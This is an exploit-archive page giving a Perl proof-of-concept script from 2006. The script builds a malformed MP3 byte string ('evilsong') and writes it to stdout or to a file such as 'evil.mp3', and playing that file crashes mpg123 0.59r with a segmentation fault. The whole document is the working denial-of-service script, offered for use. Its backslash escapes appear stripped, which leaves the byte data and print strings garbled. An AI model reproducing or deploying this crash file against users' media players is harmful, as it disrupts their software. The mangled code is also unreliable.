mpg123 0.59r Malformed mp3 (SIGSEGV) Proof of Concept

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : mpg123 0.59r Malformed mp3 (SIGSEGV) Proof of Concept
# Published : 2006-04-02
# Author : nitr0us
# Previous Title : Total Commander 6.x (unacev2.dll) Buffer Overflow PoC Exploit
# Next Title : RealPlayer <= 10.5 (6.0.12.1040-1348) SWF Buffer Overflow PoC

#!/usr/bin/perl
#
# Affected product: mpg123-0.59r - http://mpg123.de
#
# I'm not sure what kind of vulnerability is it, but the program
# receives a SIGSEGV when I play it. My gdb skillz r p00r, but
# anybody with more experience than me can find the *real* bug.
#
# $./mpg1DoS3 0 | mpg123 -
# (- switch tells mpg123 to play from stdin)
# $./mpg1DoS3 1 evil.mp3
# $mpg123 ./evil.mp3
#
# Regards.
# Nitrous
# Vulnfact Security Group - http://www.vulnfact.com

my $evilsong =
"xffxf2xc5x53xffxffxa1xe2x41x41xadx9bxfbx3f".
"xdcxe0x38x4cx7fxffx6fxe7x0cx0fxc3x3fx7fxef".
"x9axa8x3ex00xaaxe6x82xc3xe8x65x7fxf1x39x25".
"x24xecx43xe6x12x44xb9xd5x7ax2ax26xcexffxeb".
"xeaxc7x2cxdex9bxeexbax5axe7x0bx9dx14xefxe7".
"x6bxf5xa2xb0x5cx4bx23xffxffxe4xc2x53xffxff".
"xadx21x27x0dx84xd2x7dx1exadx5ex96x62x54x32".
"x85x89x24x93xedxf3xacxd4x94xeax58x54xcax29".
"x1dx7dx7exd3x34x7exb4x44x24x6ax25xdexffxed".
"x57x9dx2ex94xcbxe3xd5x48x96x74x5bxf7xd6x74".
"x84xfcx9axc0x79x75x7ax1ex31x1fx9fx9fx11x94".
"xd1x2cx48xfex5dx58xd1x9fx2bx25x2axffxffxd0".
"x15x48x1fxffxfex83x21xcfxffxffx52x61x18x6a".
"xdfxffxfax90x11x01x59x37xfdx13xf5x3cx7ex58".
"x71xe8x67xd1x0excdxeex80xb4x35x2ax4bx4fxff".
"xf8xb0x03x82x1cxf3x87x5fx6exf9x9axdcx5ex49".
"x51xc6xe0x15x04xcax49x14x0dx90x25x0ax54x04".
"x3cxc0x57x3cx8ax7ax56x1cx42xf2x47x47xb0x1c".
"x67xffxffxacxc1x17xffxffxeax19x89x63x4fxff".
"xf5x2ex91x04x59x93x93xffxf7xd5xb9x28x46x20".
"x9exd5xefxadx6dxb6x98x6cx96xacxf3xd6x8exdc".
"xc1x5ax1ax8dx02x67x1exc3xc9xfexbfxfex89xc1".
"xf4x79x98x4ex33x8bxc8x00x41x54x94x8cx06xc2".
"x69x58x8ax04xc1x76x2fx67x6cx09x0exffxfbx92".
"x60xb9x00x02x6dx67x56xe1xe7x3bx68x63x2cxea".
"xddx60xedx6dx0ax65x9dx5dx87xb5x4dxa1x71x2f".
"xabx74xf5x35xb4xd4xcexb6x76x7fx73x44x16xb5".
"x35x01x59xbfxffxfax01xa4xd7xffxffxe7x96x7f".
"xffxfexa5x89x85xbfxffxffx3cx7cx21x1fxffx7f".
"xf3x4fx63x3fx6ex3fx9ax9bx9ax54x1dx02x52x32".
"xecx7exadxd3xfdx09x82xd8x82x38xb8xa0xdexf6".
"xd3xdex23xa0x0ax51xb8xc0x61xc6xe5x20x02x48".
"x51x9cxa7x94xd7xdaxfcx4ex7axeax0bx19x84xd6".
"xcax8dx01xbbx5fxabxffxf2xa1xe6x7fxffxffxa8".
"xc8x4bx0bx1bxffxf7x5axa8x0cx18x54x44x45xbf".
"xffxe8x06x81x81x37x45x5fxf4x3dxf8x37x0dx12".
"x47xffx32x6fxccx87xa2x49";

sub usage
{
	print "###################################################n";
	print "####        mpg123 DoS Proof of Concept        ####n";
	print "###### nitrous<at>conthackto<dot>com<dot>mx  ######n";
	print "###################################################nn";
	print "Usage: $0 <mode> [evil.mp3]n";
	print "tmodes: [0 (stdout) | 1 (file)]n";
	exit;
}

if(@ARGV < 1){
	usage;
}

if($ARGV[0] == 0){
	print $evilsong;
}
elsif($ARGV[0] == 1){
	if(!$ARGV[1]){
		print "Filename required !nn";
		usage;
	}

	open(EV1L, ">$ARGV[1]") or die "Cannot create "$ARGV[1]"n";

	print EV1L $evilsong;

	close(EV1L);

	print "Ready !nNow just type $mpg123 $ARGV[1]n";
}
else{
	print "Invalid Mode !nn";
	usage;
}

# www.Syue.com [2006-04-02]